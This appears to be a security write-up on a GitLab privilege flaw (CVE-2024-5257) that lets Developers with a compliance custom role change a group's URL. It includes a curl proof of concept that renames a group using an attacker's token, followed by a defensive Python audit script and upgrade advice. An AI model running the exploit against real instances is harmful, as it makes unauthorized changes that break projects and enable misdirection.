In June 2024, a security issue was disclosed in GitLab CE/EE, affecting all versions from 17.0 up to (but not including) 17.0.4, and from 17.1 up to (but not including) 17.1.2. The vulnerability is tracked as CVE-2024-5257.

This flaw allows a Developer user in a group who has been given a custom role carrying the admin_compliance_framework permission to change the group namespace URL. Normally this action is privileged and limited to Owners. When a group namespace URL is modified unexpectedly, it breaks internal links and creates a window for phishing, misdirection, or data loss.

The Details: Why is It a Problem?

GitLab group namespaces are the unique paths under which projects, repositories, and users are organized, e.g., gitlab.com/my-company. Changing one can:

- Break external/internal references

Who is Affected?

- Any GitLab instance running a vulnerable version.
- Groups where the Developer role is granted custom permissions (especially admin_compliance_framework).

1. Setup: Custom Role Assignment

# Illustrative pseudocode, not a real GitLab API call: an Owner or Admin creates a
# custom role (based on Developer) that grants 'admin_compliance_framework'
# and assigns it to a Developer member of the group
group.developer.add_custom_role('admin_compliance_framework')

2. Exploit: Changing the Group Path

With the improper permissions in place, the Developer makes a PATCH request:

PATCH /groups/my-company
Content-Type: application/json

{
  "path": "my-company-hacked"
}

3. Effect

- All group references are now under gitlab.com/my-company-hacked
- Pipelines and CI/CD jobs using my-company namespace break

Proof-of-Concept: Simulating the Attack

Below is a curl command that exploits the issue via the GitLab API (it assumes the attacker holds a personal access token for the Developer account):

curl --request PATCH "https://gitlab.example.com/api/v4/groups/GROUP_ID" \
     --header "PRIVATE-TOKEN: ATTACKER_PERSONAL_ACCESS_TOKEN" \
     --form "path=my-company-hacked"

This should NOT be possible for a Developer, but due to this vulnerability, it works if they have the custom compliance role.

Mitigation: Review Role Assignments

Make sure the admin_compliance_framework permission isn't assigned to users unless absolutely necessary, and audit the custom roles currently defined in your groups.
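The two checks above (is the instance in an affected version range, and which members hold a custom role granting admin_compliance_framework below Owner level) can be scripted. The following is an added example written for this page, not GitLab's own code. It runs offline on constructed sample data shaped like the responses of GitLab's REST API v4 (`GET /version`, `GET /groups/:id/member_roles`, `GET /groups/:id/members`); the `fetch_json` helper, the `member_role` field on member records, and the field names in the sample data are assumptions to verify against your instance's API documentation.

```python
"""Defender-side audit for CVE-2024-5257 (added example, not GitLab's code)."""
import json
import re
import urllib.request

# Affected ranges stated in the advisory: [17.0.0, 17.0.4) and [17.1.0, 17.1.2)
AFFECTED_RANGES = [((17, 0, 0), (17, 0, 4)), ((17, 1, 0), (17, 1, 2))]

# GitLab access levels: Developer = 30, Owner = 50
DEVELOPER = 30
OWNER = 50


def parse_version(s):
    """'17.0.3-ee' -> (17, 0, 3); edition/prerelease suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", s)
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(s):
    """True when the version falls inside one of the affected ranges."""
    v = parse_version(s)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def risky_roles(member_roles):
    """Custom roles that grant admin_compliance_framework below Owner level."""
    return [r for r in member_roles
            if r.get("admin_compliance_framework")
            and r.get("base_access_level", 0) < OWNER]


def audit_members(member_roles, members):
    """(username, role name) pairs for members holding a risky custom role."""
    risky = {r["id"]: r["name"] for r in risky_roles(member_roles)}
    findings = []
    for m in members:
        role = m.get("member_role") or {}   # assumption: member_role object on members
        if role.get("id") in risky:
            findings.append((m["username"], risky[role["id"]]))
    return findings


def run_audit(version_info, member_roles, members):
    """Combine both checks into one report dictionary."""
    return {
        "vulnerable_version": is_vulnerable_version(version_info["version"]),
        "findings": audit_members(member_roles, members),
    }


def fetch_json(base_url, path, token):
    """Pull the same JSON shapes from a live instance with a read-only token
    (assumption: standard REST API v4 paths, e.g. '/version')."""
    req = urllib.request.Request(f"{base_url}/api/v4{path}",
                                 headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


# Constructed sample data (not captured from a real instance)
SAMPLE_VERSION = {"version": "17.0.3-ee"}
SAMPLE_ROLES = [
    {"id": 1, "name": "Compliance Dev", "base_access_level": DEVELOPER,
     "admin_compliance_framework": True},
    {"id": 2, "name": "Read-only Reporter", "base_access_level": 20,
     "admin_compliance_framework": False},
]
SAMPLE_MEMBERS = [
    {"username": "alice", "access_level": DEVELOPER,
     "member_role": {"id": 1, "name": "Compliance Dev"}},
    {"username": "bob", "access_level": DEVELOPER, "member_role": None},
    {"username": "carol", "access_level": OWNER},
]

if __name__ == "__main__":
    # Offline run on the constructed data; swap in fetch_json(...) calls for a live audit
    print(json.dumps(run_audit(SAMPLE_VERSION, SAMPLE_ROLES, SAMPLE_MEMBERS), indent=2))
```

On the sample data the report flags the version as vulnerable and lists alice (Developer with the "Compliance Dev" role) as the one member able to trigger this issue; a fixed instance still benefits from the role findings, since the page's point is that the permission itself should be scoped tightly.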

References & Further Reading

- GitLab Security Release Blog – 17.0.4, 17.1.2
- CVE-2024-5257 NVD Entry
- GitLab Documentation: Custom Roles

In Summary

CVE-2024-5257 is a clear example of how powerful custom roles, if not tightly scoped, can introduce security gaps. In this case, a "Developer" with an elevated compliance role could act like an Owner and change a group's URL — a critical action. If you run GitLab, double-check your version and user roles today. This one-liner can save a lot of pain:

> Upgrade to 17.0.4 or 17.1.2+ as soon as possible.

Timeline

Published on: 07/11/2024 07:15:04 UTC
Last modified on: 07/12/2024 16:54:34 UTC